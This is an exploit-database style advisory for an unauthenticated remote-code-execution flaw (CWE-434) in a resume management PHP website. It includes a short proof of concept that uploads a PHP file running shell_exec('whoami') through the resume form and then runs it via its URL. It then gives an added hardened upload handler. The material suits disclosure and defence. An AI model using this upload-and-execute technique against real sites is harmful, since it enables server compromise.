| CVE | Category | Price | Severity |
|---|---|---|---|
| N/A | CWE-434 | $500 | High |

| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Unknown | High | Remote | 2021-01-04 |

| CVSS | EPSS | EPSSP |
|---|---|---|
| CVSS:6.8/AV:N/AC:M/Au:N/C:P/I:P/A:P | 0.82112 | 0.80128 |

```
# Exploit Title: Resumes-management-and-job-application-website unauthenticated RCE
# Date: 3/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: linux/lamp
```

Submit rce.php in resume file upload unauthenticated. Contents of rce.php:

```php
<?php
$output = shell_exec('whoami');
echo "<h1>$output</h1>";
?>
```

Navigate to http://localhost/Resumes Management and Job Application Website/files/rce.php

You will get the output of whoami
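
The upload above succeeds because the application keeps the client's filename and extension and writes the file into a web-served directory where PHP executes it (CWE-434). The following is an added example of a hardened upload handler, not the vendor's code and not part of the original advisory. The function name `store_resume()`, the `resume` form field, the `/var/lib/resumes` storage path, the size limit and the PDF-only allowlist are all assumptions.

```php
<?php
// Added example: hardened resume upload handling (not the vendor's code).
// Assumed names: store_resume(), RESUME_DIR, MAX_BYTES, the "resume" form field.
declare(strict_types=1);

const RESUME_DIR = '/var/lib/resumes';   // assumption: outside the web root, never served directly
const MAX_BYTES  = 5 * 1024 * 1024;      // assumption: 5 MiB limit
// Allowlist: extension => MIME types accepted for it (PDF only in this example).
const ALLOWED = ['pdf' => ['application/pdf']];

function store_resume(array $file): string
{
    // Accept only a completed HTTP upload, not an arbitrary server-side path.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // The final extension must be on the allowlist; "rce.php" stops here.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('file type not allowed');
    }
    // Inspect the content itself; the client-supplied Content-Type is ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED[$ext], true)) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-chosen random name: the client controls neither name nor path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], RESUME_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['resume'])) {
    try {
        echo 'stored as ', htmlspecialchars(store_resume($_FILES['resume']));
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected';
    }
}
```

As a second layer, the web server should be configured so that nothing in an upload directory is ever handed to the PHP interpreter.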